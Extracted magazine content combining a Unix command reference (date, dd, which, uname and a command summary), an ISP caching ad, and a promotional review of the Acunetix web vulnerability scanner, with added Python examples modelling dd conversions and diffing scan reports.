--rfc-3339=TIMESPEC
output date and time in RFC 3339 format. TIMESPEC=‘date’, ‘seconds’, or ‘ns’ for date and time to the indicated precision.

-s, --set=STRING
set time described by STRING

-u, --utc, --universal
print or set Coordinated Universal Time.

--help
display this help and exit

--version
output version information and exit.

FORMAT controls the output. The only valid option for the second form specifies Coordinated Universal Time. Interpreted sequences are:

%%   a literal %
%a   locale’s abbreviated weekday name (e.g., Sun)
%A   locale’s full weekday name (e.g., Sunday)
%b   locale’s abbreviated month name (e.g., Jan)
%B   locale’s full month name (e.g., January)
%c   locale’s date and time (e.g., Thu Mar 3 23:05:25 2005)
%C   century; like %Y, except omit last two digits (e.g., 21)
%d   day of month (e.g., 01)
%D   date; same as %m/%d/%y
%e   day of month, space padded; same as %_d
%F   full date; same as %Y-%m-%d
%g   the last two digits of the year corresponding to the %V week number
%G   the year corresponding to the %V week number
%h   same as %b
%H   hour (00..23)
%I   hour (01..12)
%j   day of year (001..366)
%k   hour ( 0..23)
%l   hour ( 1..12)
%m   month (01..12)
%M   minute (00..59)
%n   a newline
%N   nanoseconds (000000000..999999999)
%p   locale’s equivalent of either AM or PM; blank if not known
%P   like %p, but lower case
%r   locale’s 12-hour clock time (e.g., 11:11:04 PM)
%R   24-hour hour and minute; same as %H:%M
%s   seconds since 1970-01-01 00:00:00 UTC
%S   second (00..60)
%t   a tab
%T   time; same as %H:%M:%S
%u   day of week (1..7); 1 is Monday
%U   week number of year with Sunday as first day of week (00..53)
%V   week number of year with Monday as first day of week (01..53)
%w   day of week (0..6); 0 is Sunday
%W   week number of year with Monday as first day of week (00..53)
%x   locale’s date representation (e.g., 12/31/99)
%X   locale’s time representation (e.g., 23:13:48)
%y   last two digits of year (00..99)
%Y   year
%z   +hhmm numeric timezone (e.g., -0400)
%:z  +hh:mm numeric timezone (e.g., -04:00)
%::z +hh:mm:ss numeric time zone (e.g., -04:00:00)
%:::z numeric time zone with : to necessary precision (e.g., -04, +05:30)
%Z   alphabetic time zone abbreviation (e.g., EDT)

By default, the “date” command pads numeric fields with zeroes. The following optional flags may follow ‘%’:

-   (hyphen) do not pad the field
_   (underscore) pad with spaces
0   (zero) pad with zeros
^   use upper case if possible
#   use opposite case if possible

After any flags comes an optional field width, as a decimal number; then an optional modifier, which is either E to use the locale’s alternate representations if available, or O to use the locale’s alternate numeric symbols if available.


“dd” 

dd [bs=s] [cbs=s] [conv=conversion] [count=n] [ibs=s] [if=file] [imsg=string] [iseek=n] [obs=s] [of=file] [omsg=string] [seek=n] [skip=n]


DESCRIPTION 

dd reads and writes data by blocks, and can convert the 
data between formats. dd is often used for devices such 
as tapes which have discrete block sizes, or for fast multi- 
sector reads from disks. The conversions can accommo- 
date systems that need de-blocking, conversion to/from 
EBCDIC and fixed length records. 

dd processes input data as follows: 


1. dd reads an input block. 

2. If you specified conv=sync and this input block is 
smaller than the specified input block size, dd pads 
it to the specified size with null bytes. By also spec- 
ifying a block or unblock conversion, dd pads with 
spaces instead of null bytes. 

3. If bs=size is specified and you requested no conversion 
other than sync or noerror, dd writes the input block 
(padded where necessary) to the output as a single 
block and omits the remaining steps. 

4. By specifying the swab conversion, dd swaps each 
pair of input bytes. If there is an odd number of input 
bytes, dd does not attempt to swap the last byte. 

5. dd performs all remaining conversions on the input da- 
ta independently of the input block boundaries. A fixed- 
length input or output record may span these boundaries. 

6. dd collects the converted data into output blocks of 
the specified size. When dd reaches the end of the 
input, it writes the remaining output as a block (with 
added padding if the conv=sync option is used). Con- 
sequently, the final output block can be smaller than 
the output block size. 
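The six processing steps above as a small Python model, added here for illustration; it is not dd's source and not from the original article. It covers reading ibs-sized blocks, sync padding, per-block swab, the stream-oriented block/unblock/lcase/ucase conversions and re-blocking at obs; the EBCDIC conversions are left out. Function names are my own, and `block_records` also returns the count of truncated records that dd would report on standard error.

```python
# Added model of dd's block processing (hypothetical function names).

def _swab(block: bytes) -> bytes:
    """Step 4: swap each pair of bytes within one input block; an odd
    trailing byte is left in place, as the man page states."""
    out = bytearray(block)
    for i in range(0, len(block) - 1, 2):
        out[i], out[i + 1] = block[i + 1], block[i]
    return bytes(out)


def block_records(stream: bytes, cbs: int):
    """conv=block: newline- or EOF-terminated variable-length records become
    cbs-byte fixed records, space padded or truncated.  Returns
    (data, number_of_truncated_records)."""
    records = stream.split(b"\n")
    if records and records[-1] == b"":      # trailing newline is a terminator, not a record
        records.pop()
    truncated = sum(1 for r in records if len(r) > cbs)
    return b"".join(r[:cbs].ljust(cbs, b" ") for r in records), truncated


def unblock_records(stream: bytes, cbs: int) -> bytes:
    """conv=unblock: cbs-byte fixed records (the last may be shorter) become
    variable-length records: trailing spaces removed, newline appended."""
    return b"".join(stream[i:i + cbs].rstrip(b" ") + b"\n"
                    for i in range(0, len(stream), cbs))


def dd_convert(data: bytes, ibs: int = 512, obs: int = 512,
               conv=(), cbs: int = 0) -> list:
    """Return the list of output blocks dd would write for `data`.
    bs=size in real dd simply sets ibs and obs to the same value."""
    conv = set(conv)
    pad = b" " if conv & {"block", "unblock"} else b"\0"
    # Step 1: read input blocks of ibs bytes.
    blocks = [data[i:i + ibs] for i in range(0, len(data), ibs)]
    # Step 2: conv=sync pads a short input block (with spaces under block/unblock).
    if "sync" in conv:
        blocks = [b.ljust(ibs, pad) for b in blocks]
    # Step 3: bs given (ibs == obs) and nothing beyond sync/noerror requested:
    # each input block is written as one output block; remaining steps skipped.
    if ibs == obs and not conv - {"sync", "noerror"}:
        return blocks
    # Step 4: swab is applied per input block.
    if "swab" in conv:
        blocks = [_swab(b) for b in blocks]
    # Step 5: the remaining conversions ignore input block boundaries.
    stream = b"".join(blocks)
    if "lcase" in conv:
        stream = stream.lower()
    if "ucase" in conv:
        stream = stream.upper()
    if "block" in conv:
        stream, _truncated = block_records(stream, cbs)
    if "unblock" in conv:
        stream = unblock_records(stream, cbs)
    # Step 6: collect into obs-sized output blocks; the final one may be short.
    return [stream[i:i + obs] for i in range(0, len(stream), obs)]


if __name__ == "__main__":
    # Constructed input: 5 bytes with bs=4 and conv=sync gives a NUL-padded tail.
    print(dd_convert(b"abcde", ibs=4, obs=4, conv=["sync"]))
```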


Parameters 


bs=size 

This option sets both input and output block sizes to size 
bytes. You can suffix this decimal number with w, b, k, or 
xnumber to multiply it by 2, 512, 1024, or number, respec- 
tively. You can also specify size as two decimal numbers 
(with or without suffixes) separated by x to indicate the 
product of the two values. Processing is faster when ibs 
and obs are equal, since this avoids buffer copying. The 
default block size is 1b. bs=size supersedes any settings 
of ibs=size or obs=size. Specifying bs=size with no other 
conversions than noerror, notrunc, or sync, dd writes the 
data from each input block as a separate output block. In 
the event that the input data is less than a full block and 
you did not request sync conversion, the output block is 
the same size as the input block. 


cbs=size 

Sets the size of the conversion buffer used by various 
conv options. It is possible to specify this option in the 
same way as for bs. 


conv=conversion[, conversion, ...] 
This option specifies conversion method. Conversion can 
be any of the following: 


ascii 

Converts EBCDIC input to ASCII for output. dd copies 
cbs bytes at a time to the conversion buffer, maps them 
to ASCII, then strips trailing blanks, adds a newline, and 
copies this line to the output buffer. 


block 

Converts variable-length records to fixed-length records. 
dd treats the input data as a sequence of variable-length 
records (each terminated by a newline or an EOF char- 
acter) independent of the block boundaries. dd converts 
each input record by first removing any newline charac- 
ters, then padding (with spaces) or truncating the record 
to the size of the conversion buffer. dd reports the number 
of truncated records on the standard error. It is necessary 
to specify cbs=size with this conversion setting. 


ebcdic 
Converts ASCII input to EBCDIC for output. dd copies a 
line of ASCII to the conversion buffer, discards the newline, 
pads it with trailing blanks to cbs bytes, maps it to EBCDIC 
and copies it to the output buffer. 


ibm 
Converts ASCII to a variant of EBCDIC which gives better 
output on many IBM printers. 


lcase 
Converts uppercase input to lowercase. 


noerror 
Ignore errors on input. 


notrunc 

The option sets dd so that it does not truncate the out- 
put file. If a block is explicitly written, it replaces the exist- 
ing block; all other blocks are unchanged. See also of=file 
and seek=n. 


swab 

Swaps the order of every pair of input bytes. If the current 
input record has an odd number of bytes, this conversion 
does not attempt to swap the last byte of the record. 


sync 

Pads any input block shorter than ibs to that size with null 
bytes before conversion and output. If you also specified 
block or unblock, dd uses spaces instead of null bytes 
for padding. 


ucase 
Converts lowercase input to uppercase. 


unblock 

Converts fixed-length records to variable-length records 
by reading a number of bytes equal to the size of the con- 
version buffer (or the number of bytes remaining in the 
input, if less than the conversion buffer size), deleting all 
trailing spaces, and appending a newline character. You 
must specify cbs=size with this conversion. 


convfile 

Deploys convfile as a translation table if it is not one of 
the conversion formats listed here and it is the name of a 
file of exactly 256 bytes. It is possible to perform multiple 
conversions at the same time by separating arguments to 
conv with commas; however, some conversions are mutu- 
ally exclusive (for example, ucase and lcase). 


count=n 
Copies only n input blocks to the output. 




ibs=size 
Sets the input block size to size bytes. Specify this option 
in the same way as bs. 


if=file 
Reads input data from file. If you don’t specify this option, 
dd reads data from the standard input. 


imsg=string 

Displays string when all data has been read from the cur- 
rent volume, replacing all occurrences of %d in string with 
the number of the next volume to be read. dd then reads 
and discards a line from the controlling terminal, giving 
you a chance to change volumes (usually a floppy disk). 


iseek=n 

Seeks to the nth block of the input file. The distinction be- 
tween this and skip is that iseek does not read the dis- 
carded data; however there are some devices, such as 
tape drives and communication lines, on which seeking is 
not possible, so only skip is appropriate. 


obs=size 

Sets the output block size to size bytes. Specify this option 
in the same way as bs. The size of the destination should 
be a multiple of the value chosen for size. For example, 
if you choose obs=10k, the destination’s size should be a 
multiple of 10k. 


of=file 

Writes output data to file. Without setting this option, 
dd writes data to the standard output. dd truncates the 
output file before writing to it, unless you specified the 
seek=n operand. If you specify seek=n, but do not specify 
conv=notrunc, dd preserves only those blocks in the out- 
put file over which it seeks. If the size of the seek plus the 
size of the input file is less than the size of the output file, 
this can result in a shortened output file. 


omsg=string 

Displays string when dd runs out of room while writing to the 
current volume. Any occurrences of %d in string are replaced 
with the number of the next volume to be written. dd then 
reads and discards a line from the controlling terminal, giv- 
ing you a chance to change volumes (usually a floppy disk). 


seek=n 
Initially seeks to the nth block of the output file. 


skip=n 
Reads and discards the first n blocks of input. 
“which”

Syntax

which [options] [--] program_name [...]

Options

--all, -a 

Print all matching executables in PATH, not just the first. 
--read-alias, -i

Read aliases from stdin, reporting matching ones on stdout. This is useful in combination with using an alias for which itself (e.g. alias which=’alias | which -i’).

--skip-alias

Ignore option --read-alias, if any. This is useful to explicitly search for normal binaries, while using the --read-alias option in an alias for which.

--skip-dot

Skip directories in PATH that start with a dot.


--skip-tilde 


Skip directories in PATH that start with a tilde and exe- 
cutables which reside in the HOME directory. 


--show-dot

If a directory in PATH starts with a dot and a matching executable was found for that path, then print “./program_name” rather than the full path.


--show-tilde 


Output a tilde when a directory matches the HOME directory. This option is ignored when which is invoked as root.


--tty-only 

Stop processing options on the right if not on tty. 
--version, -v, -V

Print version information on standard output then exit successfully.

--help

Print usage information on standard output then exit successfully.


RETURN VALUE 
Which returns the number of failed arguments, or -1 when 
no program name was supplied. 


EXAMPLE 
A useful way to use this command is by adding an alias for 
which like the following: 


alias which=’which --tty-only --show-tilde --show-dot’ 


This will print the readable ~/ and ./ when starting which 
from your prompt, while still printing the full path when 
used from a script: 


> which ssh
~/bin/ssh
> echo `which ssh`
/home/hacker/bin/ssh


Aliases are also supported. An example alias for which 
that is using this feature is as follows: 


alias which=’alias | which --tty-only --read-alias --show-tilde --show-dot’


This will print the output of alias for each alias that 
matches one of the given arguments. For example, using 
this alias on itself in a tcsh: 


$ alias which alias \| /usr/bin/which -i !\*
$ which which
which    (alias | ./which -i !*)
/usr/bin/which

“uname”

The “uname” command will output system information about the host and operating system it is run from. When no options are supplied, ‘uname’ acts as if the ‘-s’ flag was given.

Syntax

uname [options]...


Options 


-a, --all
Display all of the information from the flags listed below.


-m, --machine 
Display the host (hardware) type. 

-n, --nodename 

Display the host’s network node hostname. 
-p, --processor 

Display the host’s processor type. 

-r, --release 

Display the operating system release. 

-s, --sysname 


Display the operating system name. 


-v
Print the operating system version.

If multiple options or ‘-a’ are supplied, the selected information is printed in this order:

Sysname Nodename Release Osversion Machine

The OSVERSION may consist of multiple words. For instance:

$ uname -a
=> Linux linux-0915 2.6.25.16-0.1-pae #1 SMP 2008-08-21 00:34:25 +0200 i686 i686 i386 GNU/Linux


Command Summary

The following are a list of *NIX commands and a quick summary of their use.

A
alias: Create an alias
apropos: Search Help manual pages (man -k)
at: Execute scheduled command at a time
awk: Find and Replace text

B
bash: GNU Bourne-Again Shell
bg: Send to background
break: Exit from a loop

C
case: Conditionally perform a command
cat: Display the contents of a file
cd: Change the Directory
cfdisk: Partition table manipulator for Linux
chgrp: Change group ownership
chmod: Change access permissions
chown: Change file owner and group
chroot: Run a command with a different root directory
chkconfig: System services (runlevel)
cksum: Print CRC checksum and byte counts
clear: Clear the terminal screen
cmp: Compare two files
comm: Compare two sorted files line by line
command: Run a command - ignoring shell functions
continue: Resume the next iteration of a loop
cp: Copy one or more files to another location
cron: Daemon to execute scheduled commands
crontab: Schedule a command to run at a later time
csplit: Split a file into context-determined sections
cut: Divide a file into several parts

D
date: Display or change the date & time
dd: Convert and copy a file, write disk headers, boot records
declare: Declare variables and give them attributes
df: Display free disk space
diff: Display the differences between two files
dig: DNS lookup
dmesg: Print kernel & driver messages
du: Estimate file space usage

E
echo: Display message on screen
egrep: Search file(s) for lines that match an extended (regex) expression
eject: Eject removable media
emacs: A text editor
enable: Enable and disable built-in shell commands
env: Set or view environment variables
ethtool: Ethernet card settings
eval: Evaluate several commands/arguments
exec: Execute a command
exit: Exit a shell
expect: Automate arbitrary applications accessed over a terminal
expand: Convert tabs to spaces
export: Set an environment variable
expr: Evaluate expressions

F
fg: Send job to foreground
fgrep: Search file(s) for lines that match a fixed string
file: Determine the file’s type (i.e., pdf, text, etc.)
find: Search for files that meet a desired criteria
for: Expand words, and execute commands - used for looping in shells
format: Format disks or tapes
free: Display memory usage
ftp: File Transfer Protocol

G
gawk: Find and Replace text within a file/files
grep: Search file(s) for lines that match a given pattern
groups: Print group names a user is in
gzip: Compress or decompress named file/files

H
head: Output the first part of file(s)
history: Print the command history
hostname: Print or set the host’s system name

I
id: Print user and group ids
if: Conditionally perform a command
ifconfig: Configure a network interface
ifdown: Stop a network interface
ifup: Start a network interface up
import: Capture an X server screen and save the image to file

K
kill: Stop or end a running process
killall: Kill processes by name

L
less: Display output one screen at a time
let: Perform arithmetic on shell variables
ln: Make links between files
local: Create variables
locate: Find files
logname: Print the user’s current login name
logout: Exit a login shell
lpr: Print a file
lprm: Remove jobs from the print queue
ls: List information about file/files
lsof: List open files

M
make: Re/Compile a program
man: The *NIX help manual
mkdir: Create new folder/folders
mkfifo: Make FIFOs (named pipes)
mknod: Make block or character special files
more: Display output one screen at a time
mount: Mount a file system
mv: Move or rename files or directories

N
netstat: Display network information
nice: Set the priority of a command or job
nslookup: Query DNS servers interactively

O
open: Open a file in its default application

P
passwd: Modify a user’s password
ping: Test a network connection
popd: Restore the previous value of the current directory
ps: Process status
pushd: Save and then change the current directory

Q
quota: Display disk usage and limits
quotacheck: Scan a file system for disk usage
quotactl: Set disk quotas

R
ram: Create and manage a RAM based disk device
rcp: Copy files between two machines
read: Read a line from standard input
reboot: Reboot the system
renice: Alter priority of running processes
remsync: Synchronize remote files via email
return: Exit a shell function
rev: Reverse lines of a file
rm: Remove files
rmdir: Remove folder/folders
rsync: Remote file copy (Synchronize file trees)

S
screen: Multiplex terminal, run remote shells via ssh
scp: Secure copy (remote file copy)
sdiff: Merge two files interactively
sed: The stream Editor
select: Accept keyboard input
seq: Print numeric sequences
set: Manipulate shell variables and functions
sftp: Secure File Transfer Program
shift: Shift positional parameters
shopt: Shell Options
shutdown: Shutdown or restart linux
sleep: Delay for a specified time
slocate: Find files
sort: Sort text files
source: Run commands from a file ‘.’
split: Split a file into fixed-size sections
ssh: Secure Shell client (an encrypted remote login program)
strace: Trace system calls and signals
su: Substitute user identity
sudo: Execute a command as another user
sum: Print a checksum for a file

T
tail: Output the last part of files
tar: Tape Archiver
tee: Redirect output to multiple files
time: Measure a program’s running time
touch: Change file timestamps
top: List the processes running on the system
traceroute: Trace the Route to a Host over a network
trap: Run a command when a signal is set (bourne)
tty: Print filename of terminal on stdin
type: Describe a command

U
ulimit: Limit user resources
umask: Change a user’s file creation mask
umount: Unmount a device
unalias: Remove an alias
uname: Print system information
unexpand: Convert spaces to tabs
unset: Remove variable or function names
unshar: Unpack shell archive scripts
until: Execute commands (until error)
useradd: Create a new user account
usermod: Modify a user account
users: List the currently logged in users on a system
uuencode: Encode a binary file
uudecode: Decode a file created by uuencode

V
vi: Text Editor
vmstat: Report virtual memory statistics

W
watch: Execute or display a program periodically (that is, every so often)
wc: Print byte, word, and line counts
whereis: Report all known instances of a command
which: Locate a program file in the user’s path.
while: Execute commands when a statement is true
who: Print all of the usernames currently logged into a host
whoami: Print the current user id and name (‘id -un’)
wget: Retrieve web pages or files via HTTP, HTTPS or FTP
write: Send a message to another user on a host
Faster. 
Better. 
Reliable. 
Trusted by over 500 ISPs worldwide. 


Hyper is the first multimedia cache fully developed in Brazil, by Taghos. 
With Hyper, ISPs can save on network bandwidth while increasing 
content-delivery speeds, resulting in end-customer satisfaction. 


Features: 

- 24x7X365 always-on support 

- Active monitoring 

- Automatic updates 

- Appliance or license 

- Easy deployment 

- Configuration and reports via 
web interface 


[Table: Hyper appliance models from “Up to 15 Mbps” to “Up to 3 Gbps”, listing RAM, disk and cache drive configuration for each, with “Remote Install” and “Using your hardware” options; the column layout was lost in extraction.]


Visit us at WWW.taghos.com and start saving bandwidth today! 


Acunetix Web 


Vulnerability Scanner 


Find out if your website is secure before hackers download 
sensitive data, commit a crime by using your website as a 
launch pad, and endanger your business. Acunetix Web 
Vulnerability Scanner (WVS) crawls your website, automatically 
analyzes your web applications and finds perilous SQL 
injections, Cross site scripting and other vulnerabilities that 
expose your online business. Concise reports identify where 
web applications need to be fixed, thus enabling you to 
protect your business from impending hacker attacks! 


In today’s threat landscape, organizations and security professionals can no longer focus on the patching and infrastructure vulnerabilities. If regulations or industry standards are not your driver, you can guarantee that clients will soon be asking “how are you securing your applications?” As with any solution you need to have the people, processes, and technology in place to be successful. While much of this testing could be done manually, the proliferation of applications used in organizations today would make manual testing an insurmountable and never-ending task. Application Security testing tools are often the best solution for security professionals tasked with securing applications throughout the Software Development Lifecycle (SDLC). This is where we introduce Acunetix! As a precursor to the remainder of this article, I have had the opportunity to work with a number of Application Security tools for large enterprises. This is the first time I have worked directly with Acunetix.


What is Acunetix Web Vulnerability Scanner

In Acunetix’s own words:

Acunetix Web Vulnerability Scanner is an automated web application security testing tool that audits your web applications by checking for vulnerabilities like SQL Injection, Cross site scripting, and other exploitable vulnerabilities.


The need to be able to test applications in depth and 
further than traditional vulnerability management tools 
(e.g. Nessus, Nexpose, etc.) do, has created a market 
with several players in the Application Security space. 
Whereas Nessus / Nexpose are vulnerability manage- 
ment (VM) tools, Acunetix focuses more on web appli- 
cation vulnerabilities and variants thereof, and does 
a much better job at detection than traditional VM tools. 


Key Features and Functionality 

I could spend time walking you through how to complete a scan with Acunetix, but the “getting started” and “user manual” provide a wealth of information for this. The best use of your time will be to understand the features that distinguish Acunetix from the other vulnerability scanners.


• Vulnerability Detection — First and foremost, does Acunetix do what it says it does? The resounding answer is...YES! The ability to scan HTML5/JS sites provides coverage where a number of products start to fall apart. Additionally, the speed of the scanner allows scans to be completed in very little time. When I did a side by side comparison I found a number of features with Acunetix I did not see with OSS (Open Source Software) products.

• AcuSensor — AcuSensor is an agent installation that 
is installed on the web server for testing purposes, in- 
teracting with the console. This allows the number of 
false positives to be reduced as the scanner is not on- 
ly relying on HTTP responses but will also interact with 
the agent on the server to determine if the test was 
successful or not. At the time of this writing, AcuSen- 
sor is used primarily with PHP and .NET web applica- 
tions. I understand that other products have this simi- 
lar technology for JAVA so before investing make sure 
you understand how your applications were written so 
you can fully take advantage of this. To emphasise, 
AcuSensor identifies more vulnerabilities than a tra- 
ditional black box web security scanner and reduc- 
es false positives. AcuSensor will show you the line 
of code where it found the vulnerability, which helps 
you to get it fixed faster. This is achieved by combin- 
ing black box scanning techniques with dynamic code 
analysis whilst the source code is being executed. 

• It is also possible to detect some vulnerabilities using 
an intermediary server. AcuMonitor allows Acunetix 
WVS to find such vulnerabilities, including Blind XSS, 
Server Side Request Forgery and Email Header In- 
jection. It depends on the vulnerability but it can be 
reported during the scan and also by an email which 
will be sent directly to the user. 

• Tools — These are a few of the features that jumped 
out at me right away. Some of the tools are not some- 
thing you'd expect to see in a Web Application Secu- 
rity scanner, but such tools aid interpretation of the 
scan results. 

Figure 1. The Acunetix tools pane: Subdomain Scanner, Blind SQL Injector, HTTP Editor, HTTP Sniffer, HTTP Fuzzer, Authentication Tester, Compare Results.
• Target Finder — This functionality lets you scan subnets looking for web services by port (e.g. 80, 443, etc.). This functionality is important especially in organizations where there is uncertainty about where web services are actually running and where some malware might have installed web servers on users' machines. This is something that is missing in some of the other products out there today.

• Subdomain scanner — this is another feature that I did not expect to find in a web security scanner. The ability to search for subdomains based on DNS records automatically is another valuable tool for someone trying to get a handle on their environment.

• Compare Results — Conducting repeat scans to confirm that issues have been remediated has been problematic in other tools. This feature made the issues between each test easy to distinguish.

• The Scheduler — Acunetix allows you to schedule your scans for a single site or multiple sites. This is a great feature in a vulnerability scanner as it allows you to test during those late night maintenance windows without giving up those precious hours of sleep or drinking!

• Single Pane Navigation — While this is more of a preference, there were many instances where I have spent time reviewing issues with application teams having to flip through multiple screens. The Acunetix issue Summary is managed in one pane with all the relevant information provided such as issue details, issue Summaries, and recommended fixes. The tools mentioned above are all in the same frame as well.


Other Useful Functionalities 

It is impossible to detail all the functionalities of the scanner in one article but these last few certainly deserve a mention.

One of these is the ability of Acunetix to crawl and scan HTML5/JS sites including Angular JS, which is already ahead of the pack in version 9.5 and I'm told will be further strengthened in version 10. This is one feature which readers should find very useful.

Another plus is that the information is easy to understand, the vulnerabilities are categorized allowing the user to focus on the most important alerts, and the results include information on the vulnerability, remediation advice and are augmented with external references. In addition, whilst working on the review, the Bash vulnerability was discovered, and within 24 hours Acunetix notified of an update for a check for Shellshock.
Positives

Easy to use — Acunetix is extremely easy to use right after being installed. Additionally, it allowed me to configure the scan with some more in depth testing options to ensure I covered most of the application without sacrificing speed. All key features and functionality are contained within the application (i.e. issue retest, scan templates, CVE info, Web Services scanning, etc.) and easily found so that the documentation provided is rarely needed. The additional tools (Target finder, subdomain scanners, port scanner, etc.) for discovery of your environment are a great addition to the product.

Application Authentication — Authenticating your application is important, as you want to make sure you cover your entire application as part of the test. This has always been challenging in other products (even with a completely separate application to manage authentication). Acunetix did a good job of handling the application authentication through various applications without much hassle.

Pricing — I have worked with other solutions before and pricing always seemed to be complex and tiered. The Acunetix pricing model is very straightforward and very reasonably priced (https://www.acunetix.com/ordering/).

Product Transparency — Any time I evaluate any product I open my favourite search engine and type in '$productname bugs' or '$productname request for enhancements' to find some forums on problems that current users are having. I was surprised to see that Acunetix will make all this information available to all people including non-customers: http://acunetixwvs.ideascale.com/a/ideafactory.do. This is of some reassurance that you're not falling into that slippery salesman approach and that you know what you are buying. Check out this page!

The comparative analyses of similar priced competitor scanners show that Acunetix scans for and detects 2 — 3 times the number of vulnerabilities with lower false positives and higher confidence. So you will scan up to 2 times faster, and you are nonetheless at par or better than the ones that are more highly priced. This is because of the Acunetix DeepScan crawling and scanning technology and also because the lab has a much larger collection of scripted or choreographed hacking simulations and a wider variety of variants that they generate in their War Games Lab than most other similarly priced scanners. They also provide you with a fully documented SDK for scanning script customization.


Results 


Acunetix focuses on being a good scanner giving good technical results and a palette of reports. A scan is usually run on a single target.

Acunetix Web Vulnerability Scanner


On the Net 


• 14-day Acunetix WVS Download — http://www.acunetix.com/vulnerability-scanner/download/

• 14-day Acunetix OVS Registration — http://www.acunetix.com/vulnerability-scanner/register-online-vulnerability-scanner/

• Acunetix Website — http://www.acunetix.com

• Online Scan with Acunetix — https://www.acunetix.com/vulnerability-scanner/register-online-vulnerability-scanner/

• Audit Your Website Security with Acunetix Web Vulnerability Scanner — https://www.acunetix.com/vulnerability-scanner/

• Advanced Pen-Testing Tools — https://www.acunetix.com/vulnerability-scanner/pen-testing-tools/

• Regulatory Compliance Reports for PCI, HIPAA and others — https://www.acunetix.com/vulnerability-scanner/pci-regulatory-compliance/

• AcuMonitor Service — http://www.acunetix.com/websitesecurity/acumonitor/


About Acunetix 

Securing the web applications of today's businesses is perhaps the most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications — which often have a direct line into the company's most valuable data assets — are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.

Acunetix was founded with this threat in mind. It was understood that the only way to combat website hacking was to develop an automated tool that could help companies scan their web applications to identify and resolve exploitable vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a heuristic tool designed to replicate a hacker's methodology to find dangerous vulnerabilities — like SQL injection and cross site scripting — before hackers do. Acunetix WVS brings an extensive feature-set of both automated and manual penetration testing tools, enabling security analysts to perform a complete vulnerability assessment, and repair detected threats, with just the one product.

The Acunetix development team consists of highly experienced security developers, all with extensive development experience in network security scanning software prior to working on Acunetix WVS. The management team is backed by years of experience in marketing and selling security software.

From www.acunetix.com


• Acunetix provides CVE, CVSS, CWE scores either in the results or in the reports, as well as OWASP, SANS reports. Results can be compared using Acunetix result comparison. Of course risk would need to be further assessed on the basis of the target app importance. If Acunetix is repeatedly used on multiple targets then data aggregation solutions need to be made available.

• Acunetix results can be consumed by a vulnerability data management system to address more management requirements. These solutions would use Acunetix XML outputs to integrate with Vulnerability Management aggregation tools such as one particular Technology Partner Acunetix works with, whereby the vulnerability information resulting from multiple orchestrated scans and/or scanners would be overlaid onto a matrix of applications classified by importance to help prioritize remediation tasks. That system comes complete with defect tracking and management system integration which then lines up tasks for developers in an SDLC environment to look into. Acunetix can point to and support integration with such solutions that could be deployed to achieve these goals at a fee if not already available out of the box as with particular Technology Partners.
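The two ideas above, comparing a baseline scan with a retest to confirm remediation (the Compare Results feature described earlier) and consuming a scanner's XML export in a vulnerability management workflow, can be illustrated with a small script. This is an added example, not Acunetix code: the `<scan>`/`<alert>` XML layout, the report contents and the finding identity rule (same check name, URL and parameter) are all constructed assumptions for the example, not the real Acunetix report schema. The script parses two constructed reports and splits the findings into fixed, new and persistent sets, sorted so the highest severity comes first.

```python
"""Diff two web-vulnerability scan reports: which findings were fixed, which are new,
which persist. Constructed example; the XML layout below is NOT the Acunetix schema."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample reports: a baseline scan and a retest after remediation work.
BASELINE_XML = """<?xml version="1.0"?>
<scan target="https://app.example.test" started="2014-10-01">
  <alert><name>SQL Injection</name><severity>high</severity><cwe>CWE-89</cwe>
         <url>/login.php</url><parameter>username</parameter></alert>
  <alert><name>Cross-site Scripting</name><severity>medium</severity><cwe>CWE-79</cwe>
         <url>/search.php</url><parameter>q</parameter></alert>
  <alert><name>Missing X-Frame-Options header</name><severity>low</severity><cwe>CWE-1021</cwe>
         <url>/</url><parameter></parameter></alert>
</scan>"""

RETEST_XML = """<?xml version="1.0"?>
<scan target="https://app.example.test" started="2014-10-08">
  <alert><name>Cross-site Scripting</name><severity>medium</severity><cwe>CWE-79</cwe>
         <url>/search.php</url><parameter>q</parameter></alert>
  <alert><name>Missing X-Frame-Options header</name><severity>low</severity><cwe>CWE-1021</cwe>
         <url>/</url><parameter></parameter></alert>
  <alert><name>Server Side Request Forgery</name><severity>high</severity><cwe>CWE-918</cwe>
         <url>/fetch.php</url><parameter>url</parameter></alert>
</scan>"""

SEVERITY_RANK = {"high": 3, "medium": 2, "low": 1, "informational": 0}


@dataclass(frozen=True)
class Finding:
    name: str
    url: str
    parameter: str
    severity: str
    cwe: str

    def key(self):
        # Identity across scans: the same check on the same input. Scanner-assigned ids
        # and timestamps change between runs, so they must not be part of the key.
        return (self.name.strip().lower(), self.url.strip(), self.parameter.strip())


def parse_report(xml_text):
    """Extract Finding records from a constructed <scan> report.
    Reports from a third-party tool are untrusted input; for real exports prefer
    defusedxml over the stdlib parser."""
    root = ET.fromstring(xml_text)
    findings = []
    for alert in root.iter("alert"):
        text = lambda tag, default="": (alert.findtext(tag) or default).strip()
        findings.append(Finding(
            name=text("name"),
            url=text("url"),
            parameter=text("parameter"),
            severity=text("severity", "informational").lower(),
            cwe=text("cwe"),
        ))
    return findings


def compare_scans(baseline_xml, retest_xml):
    """Return {'fixed': [...], 'new': [...], 'persistent': [...]}, each list sorted by
    descending severity, then URL, then name."""
    base = {f.key(): f for f in parse_report(baseline_xml)}
    retest = {f.key(): f for f in parse_report(retest_xml)}
    fixed = [base[k] for k in base.keys() - retest.keys()]
    new = [retest[k] for k in retest.keys() - base.keys()]
    persistent = [retest[k] for k in base.keys() & retest.keys()]

    def order(f):
        return (-SEVERITY_RANK.get(f.severity, 0), f.url, f.name)

    return {"fixed": sorted(fixed, key=order),
            "new": sorted(new, key=order),
            "persistent": sorted(persistent, key=order)}


def count_by_severity(findings):
    """Summary counts, e.g. for a ticketing or aggregation system."""
    counts = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


if __name__ == "__main__":
    result = compare_scans(BASELINE_XML, RETEST_XML)
    for bucket, items in result.items():
        print(f"{bucket} ({count_by_severity(items)}):")
        for f in items:
            print(f"  [{f.severity:<6}] {f.name} at {f.url} param={f.parameter!r} {f.cwe}")
```

Keying findings on check name, URL and parameter rather than on the scanner's own alert identifiers is what makes retest comparison robust across runs; the same rule is what an aggregation tool would use to deduplicate results from several scanners before overlaying them on an application inventory.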


